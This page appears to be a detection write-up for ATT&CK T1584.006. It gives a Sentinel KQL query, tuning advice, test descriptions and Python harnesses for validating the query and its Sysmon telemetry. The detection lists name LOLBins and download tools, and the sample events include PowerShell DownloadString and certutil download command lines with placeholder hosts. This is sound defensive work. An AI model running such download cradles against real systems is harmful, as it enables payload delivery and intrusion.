Detect Web Services in Microsoft Sentinel
Adversaries may compromise access to third-party web services to use as infrastructure during cyber operations. Popular platforms such as GitHub, WordPress, Google Drive, Dropbox, Discord, and SendGrid are targeted because they offer high availability, trusted domain reputations, and blend into legitimate organizational traffic. Compromised web service accounts are leveraged for command and control (C2) via dead-drop resolvers, payload hosting, data exfiltration staging, and phishing campaign infrastructure. Real-world examples include Turla using compromised WordPress sites for C2, Earth Lusca abusing Google Drive repositories, Gootloader inserting malicious scripts into CMS installations, and Winter Vivern hosting malicious payloads on compromised WordPress instances. Detection pivots to observable network behavior: suspicious processes making connections to web service API domains, scripting engines or LOLBins fetching content from anonymous paste sites, and non-browser processes accessing WordPress-specific URL paths on external domains.
MITRE ATT&CK
- Tactic: Resource Development
- Technique: T1584 Compromise Infrastructure
- Sub-technique: T1584.006 Web Services
- Canonical reference: https://attack.mitre.org/techniques/T1584/006/
KQL Detection Query
let WebServiceDomains = dynamic([
"github.com", "githubusercontent.com", "githubusercontents.com",
"pastebin.com", "paste.ee", "pastecode.io", "hastebin.com",
"dropbox.com", "dropboxusercontent.com",
"googleapis.com", "drive.google.com", "docs.google.com",
"discord.com", "discordapp.com",
"sendgrid.net", "sendgrid.com",
"hooks.slack.com",
"notion.so"
]);
// WordPress-specific paths that indicate a compromised CMS serving content
let WordPressPaths = dynamic(["/wp-content/uploads/", "/wp-includes/", "/xmlrpc.php"]);
let SuspiciousCallers = dynamic([
"powershell.exe", "pwsh.exe", "cmd.exe",
"wscript.exe", "cscript.exe", "mshta.exe",
"regsvr32.exe", "rundll32.exe", "msbuild.exe",
"certutil.exe", "bitsadmin.exe",
"curl.exe", "wget.exe"
]);
DeviceNetworkEvents
| where Timestamp > ago(24h)
// Match the abused web service domains, or WordPress paths on any external host.
// Without the second clause, WordPressPath below could only be true for URLs that
// are also on the WebServiceDomains list, so compromised CMS hosts would never surface.
| where RemoteUrl has_any (WebServiceDomains) or RemoteUrl has_any (WordPressPaths)
| where InitiatingProcessFileName in~ (SuspiciousCallers)
| extend ProcessCategory = case(
InitiatingProcessFileName in~ ("powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"), "ScriptingEngine",
InitiatingProcessFileName in~ ("mshta.exe", "regsvr32.exe", "rundll32.exe", "msbuild.exe"), "LOLBin",
InitiatingProcessFileName in~ ("certutil.exe", "bitsadmin.exe", "curl.exe", "wget.exe"), "DownloadUtility",
"Other"
)
| extend HighRiskParent = InitiatingProcessParentFileName in~ (
"outlook.exe", "winword.exe", "excel.exe", "powerpnt.exe",
"onenote.exe", "mspub.exe", "acrord32.exe", "chrome.exe", "msedge.exe", "firefox.exe"
)
| extend WordPressPath = RemoteUrl has_any (WordPressPaths)
| project Timestamp, DeviceName, AccountName,
InitiatingProcessFileName, InitiatingProcessCommandLine,
RemoteUrl, RemoteIP, RemotePort,
InitiatingProcessParentFileName, InitiatingProcessParentCommandLine,
ProcessCategory, HighRiskParent, WordPressPath
| sort by Timestamp desc

Detects suspicious processes making outbound network connections to web service domains commonly abused for C2 payload hosting, dead-drop resolvers, and exfiltration staging. Monitors scripting engines (PowerShell, WScript, CScript), LOLBins (mshta, regsvr32, rundll32, msbuild), and download utilities (certutil, bitsadmin, curl, wget) connecting to GitHub, Pastebin, Google Drive, Dropbox, Discord, and similar platforms, and, independently of the domain list, any external URL carrying WordPress-specific paths. Flags HighRiskParent when the calling process was spawned by an Office application or browser (a phishing delivery indicator) and WordPressPath when the URL contains WordPress-specific directory patterns indicating a compromised CMS being used to serve payloads.
Data Sources
Required Tables
- DeviceNetworkEvents (Microsoft Defender for Endpoint)
False Positives & Tuning
- Developer workstations where git.exe, the GitHub CLI (gh.exe), or IDE tools legitimately invoke curl.exe or PowerShell to call GitHub APIs for source code operations
- IT automation scripts using curl.exe or PowerShell Invoke-WebRequest to download software packages or configuration files from authorized cloud storage (Dropbox, Google Drive)
- Backup agents with known process names connecting to Dropbox or Google Drive APIs as part of data protection workflows
- CI/CD pipeline agents running as Windows services that use PowerShell or curl to interact with GitHub repositories for deployment operations
- Security tooling (threat intelligence platforms, SOAR connectors) that periodically calls external APIs to fetch threat feeds or submit samples
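To show how the query's matching and tagging behave, and how the tuning above translates into suppression logic, here is an added Python re-implementation that is not the page's own code and not a Sentinel API. It mirrors the query's where/extend steps over constructed DeviceNetworkEvents-style rows (field names follow that table's schema; the rows, the allowlist rules, the `svc_cicd` account and the hostnames are assumptions) so the logic can be unit-tested offline before the KQL is deployed. It also approximates KQL's term-based `has_any`, which is why the domain list needs both `github.com` and `githubusercontent.com`.

```python
import re

WEB_SERVICE_DOMAINS = [
    "github.com", "githubusercontent.com", "pastebin.com", "paste.ee",
    "dropbox.com", "dropboxusercontent.com", "drive.google.com",
    "discord.com", "discordapp.com", "sendgrid.net", "hooks.slack.com",
]
WORDPRESS_PATHS = ["/wp-content/uploads/", "/wp-includes/", "/xmlrpc.php"]
SCRIPTING = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
LOLBINS = {"mshta.exe", "regsvr32.exe", "rundll32.exe", "msbuild.exe"}
DOWNLOADERS = {"certutil.exe", "bitsadmin.exe", "curl.exe", "wget.exe"}
SUSPICIOUS_CALLERS = SCRIPTING | LOLBINS | DOWNLOADERS | {"cmd.exe"}
HIGH_RISK_PARENTS = {"outlook.exe", "winword.exe", "excel.exe", "powerpnt.exe",
                     "onenote.exe", "mspub.exe", "acrord32.exe",
                     "chrome.exe", "msedge.exe", "firefox.exe"}

# Tuning allowlist (constructed assumptions, not an official list): a row is
# suppressed when every key in a rule equals the corresponding event field.
_RULE_FIELDS = {"process": "InitiatingProcessFileName",
                "parent": "InitiatingProcessParentFileName",
                "account": "AccountName"}
ALLOWLIST = [
    {"process": "curl.exe", "parent": "git.exe"},          # developer git over HTTPS
    {"process": "powershell.exe", "account": "svc_cicd"},  # CI/CD agent service account
]


def _terms(text):
    return re.findall(r"[a-z0-9]+", text.lower())


def has_any(text, phrases):
    """Approximation of KQL has_any: a phrase must appear as adjacent whole terms,
    not as a raw substring. "github.com" matches "https://api.github.com/..." but
    not "https://raw.githubusercontent.com/...", whose host is the single term
    "githubusercontent"; the query therefore lists githubusercontent.com too."""
    terms = _terms(text)
    for phrase in phrases:
        pt = _terms(phrase)
        n = len(pt)
        if n and any(terms[i:i + n] == pt for i in range(len(terms) - n + 1)):
            return True
    return False


def categorize(process):
    p = process.lower()
    if p in SCRIPTING:
        return "ScriptingEngine"
    if p in LOLBINS:
        return "LOLBin"
    if p in DOWNLOADERS:
        return "DownloadUtility"
    return "Other"


def is_allowlisted(event):
    return any(all(event.get(_RULE_FIELDS[k], "").lower() == v.lower()
                   for k, v in rule.items()) for rule in ALLOWLIST)


def evaluate(event):
    """Mirror of the query's where/extend steps; returns the projected row or None."""
    proc = event.get("InitiatingProcessFileName", "").lower()
    url = event.get("RemoteUrl", "")
    if proc not in SUSPICIOUS_CALLERS:
        return None
    if not (has_any(url, WEB_SERVICE_DOMAINS) or has_any(url, WORDPRESS_PATHS)):
        return None
    parent = event.get("InitiatingProcessParentFileName", "").lower()
    return {"DeviceName": event.get("DeviceName"), "InitiatingProcessFileName": proc,
            "RemoteUrl": url, "ProcessCategory": categorize(proc),
            "HighRiskParent": parent in HIGH_RISK_PARENTS,
            "WordPressPath": has_any(url, WORDPRESS_PATHS)}


def run_detection(events, apply_tuning=True):
    """Apply the allowlist first, then the detection logic; returns alert rows."""
    rows = []
    for e in events:
        if apply_tuning and is_allowlisted(e):
            continue
        row = evaluate(e)
        if row is not None:
            rows.append(row)
    return rows


# Constructed sample rows (not real telemetry).
SAMPLE_EVENTS = [
    {"DeviceName": "ws01", "AccountName": "jdoe", "InitiatingProcessFileName": "powershell.exe",
     "InitiatingProcessParentFileName": "winword.exe",
     "RemoteUrl": "https://raw.githubusercontent.com/ex-org/ex-repo/main/stage.txt"},
    {"DeviceName": "ws02", "AccountName": "asmith", "InitiatingProcessFileName": "certutil.exe",
     "InitiatingProcessParentFileName": "cmd.exe", "RemoteUrl": "https://pastebin.com/raw/abcd1234"},
    {"DeviceName": "dev03", "AccountName": "dev", "InitiatingProcessFileName": "curl.exe",
     "InitiatingProcessParentFileName": "git.exe", "RemoteUrl": "https://api.github.com/repos/ex-org/ex-repo"},
    {"DeviceName": "ws04", "AccountName": "jdoe", "InitiatingProcessFileName": "chrome.exe",
     "InitiatingProcessParentFileName": "explorer.exe", "RemoteUrl": "https://drive.google.com/file/d/xyz"},
    {"DeviceName": "ws05", "AccountName": "bwayne", "InitiatingProcessFileName": "mshta.exe",
     "InitiatingProcessParentFileName": "explorer.exe",
     "RemoteUrl": "https://blog.example/wp-content/uploads/2024/01/update.hta"},
    {"DeviceName": "build01", "AccountName": "svc_cicd", "InitiatingProcessFileName": "powershell.exe",
     "InitiatingProcessParentFileName": "services.exe", "RemoteUrl": "https://github.com/ex-org/ex-repo"},
]

if __name__ == "__main__":
    for row in run_detection(SAMPLE_EVENTS):
        print(row)
```

Running it yields three rows (ws01, ws02, ws05): the developer's `curl.exe` under `git.exe` and the CI/CD service account are suppressed by the allowlist, the browser row never matches because `chrome.exe` is not a suspicious caller, and the `mshta.exe` row is caught purely on its WordPress path even though its host is not on the domain list. Keep allowlist rules narrow (process plus parent or account, never process alone), since a broad rule on `powershell.exe` would also silence the phishing chain in the first row.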
Testing Methodology
Validate this detection against four adversary test cases from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1: PowerShell Dead-Drop Resolver via GitHub Raw Content
Expected signal: Sysmon Event ID 1: Process Create with Image=powershell.exe, CommandLine containing 'raw.githubusercontent.com' and 'DownloadString'. Sysmon Event ID 3: Network Connection from powershell.exe to raw.githubusercontent.com on port 443. Sysmon Event ID 22: DNS query for raw.githubusercontent.com. PowerShell ScriptBlock Log Event ID 4104: full script content including the URL.
- Test 2: Certutil LOLBin Download from Pastebin
Expected signal: Sysmon Event ID 1: Process Create with Image=certutil.exe, CommandLine containing '-urlcache', '-split', '-f', and 'pastebin.com'. Sysmon Event ID 3: Network Connection from certutil.exe to pastebin.com on port 443. Sysmon Event ID 11: File Create event for the output file in %TEMP%.
- Test 3: cURL Payload Retrieval from Discord CDN
Expected signal: Sysmon Event ID 1: Process Create with Image=curl.exe, CommandLine containing 'discord.com' and '-o'. Sysmon Event ID 3: Network Connection from curl.exe to discord.com on port 443. Sysmon Event ID 11: File Create event for the output file in %TEMP%.
- Test 4: WScript Accessing Compromised Web Service via JScript
Expected signal: Sysmon Event ID 1 (first): Process Create for powershell.exe creating the JS file. Sysmon Event ID 11: File Create for %TEMP%\df00tech_wstest.js. Sysmon Event ID 1 (second): Process Create for wscript.exe executing the JS file. Sysmon Event ID 3: Network Connection from wscript.exe to api.github.com on port 443. Sysmon Event ID 22: DNS query for api.github.com from wscript.exe.
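The expected-signal lists above are only useful if you check them against what actually landed in the SIEM. The following added Python example (not the page's own tooling) correlates constructed Sysmon-style events by ProcessGuid and reports, per test, which expected Event IDs are missing, so a telemetry gap (for example Sysmon not logging FileCreate under %TEMP%) shows up before the detection is trusted. Field names follow Sysmon's event schema; the event rows, the GUID labels and the `<org>/<repo>` placeholders are constructed, and the specs cover Tests 1 and 2 only.

```python
import os

# Expected signals per test, transcribed from the list above.
# Event IDs: 1 = Process Create, 3 = Network Connection, 11 = File Create, 22 = DNS query.
EXPECTED = {
    "Test 1": {"image": "powershell.exe",
               "tokens": ["raw.githubusercontent.com", "DownloadString"],
               "host": "raw.githubusercontent.com", "port": 443, "signals": (1, 3, 22)},
    "Test 2": {"image": "certutil.exe",
               "tokens": ["-urlcache", "-split", "-f", "pastebin.com"],
               "host": "pastebin.com", "port": 443, "signals": (1, 3, 11)},
}


def _image_name(path):
    """Basename of a Windows or POSIX image path, lower-cased for comparison."""
    return os.path.basename(path.replace("\\", "/")).lower()


def _process_guids(events, spec):
    """ProcessGuids of EID 1 events whose image and command line match the spec."""
    return {e["ProcessGuid"] for e in events
            if e["EventID"] == 1 and _image_name(e["Image"]) == spec["image"]
            and all(t.lower() in e["CommandLine"].lower() for t in spec["tokens"])}


def _signal_seen(eid, events, guids, spec):
    """True if the expected event of type eid was emitted by one of the matched processes."""
    if eid == 1:
        return bool(guids)
    for e in events:
        if e["EventID"] != eid or e.get("ProcessGuid") not in guids:
            continue  # same host from an unrelated process does not count
        if eid == 3 and e.get("DestinationHostname") == spec["host"] \
                and e.get("DestinationPort") == spec["port"]:
            return True
        if eid == 22 and e.get("QueryName") == spec["host"]:
            return True
        if eid == 11 and "\\temp\\" in e.get("TargetFilename", "").lower():
            return True
    return False


def validate(test_name, events):
    spec = EXPECTED[test_name]
    guids = _process_guids(events, spec)
    missing = [eid for eid in spec["signals"] if not _signal_seen(eid, events, guids, spec)]
    return {"process_guids": sorted(guids), "missing": missing, "passed": not missing}


# Constructed events: Test 1 produced its full chain; Test 2 produced EID 1 and 3 but
# no EID 11 (e.g. the Sysmon config has no FileCreate rule covering %TEMP%).
SYSMON_EVENTS = [
    {"EventID": 1, "ProcessGuid": "{G1}",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe ... DownloadString('https://raw.githubusercontent.com/<org>/<repo>/main/stage.txt')"},
    {"EventID": 22, "ProcessGuid": "{G1}", "QueryName": "raw.githubusercontent.com"},
    {"EventID": 3, "ProcessGuid": "{G1}", "DestinationHostname": "raw.githubusercontent.com",
     "DestinationPort": 443},
    {"EventID": 1, "ProcessGuid": "{G2}", "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f https://pastebin.com/raw/<paste> <outfile>"},
    {"EventID": 3, "ProcessGuid": "{G2}", "DestinationHostname": "pastebin.com", "DestinationPort": 443},
    # Unrelated process reaching the same host; must not satisfy Test 2's EID 3.
    {"EventID": 3, "ProcessGuid": "{G9}", "DestinationHostname": "pastebin.com", "DestinationPort": 443},
]

if __name__ == "__main__":
    for name in EXPECTED:
        print(name, validate(name, SYSMON_EVENTS))
```

Correlating on ProcessGuid rather than on image name or hostname alone is the point: a network connection to pastebin.com from some other process (the `{G9}` row) would otherwise make Test 2 look fully covered, and the real gap, the missing File Create event, would go unnoticed until an incident.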
References (7)
- https://attack.mitre.org/techniques/T1584/006/
- https://www.recordedfuture.com/research/turla-apt-infrastructure
- https://www.trendmicro.com/en_us/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques.html
- https://www.sentinelone.com/labs/gootloaders-gone-wild/
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc.html
- https://www.sentinelone.com/labs/winter-vivern-all-summer-long/
- https://threatconnect.com/blog/infrastructure-research-hunting/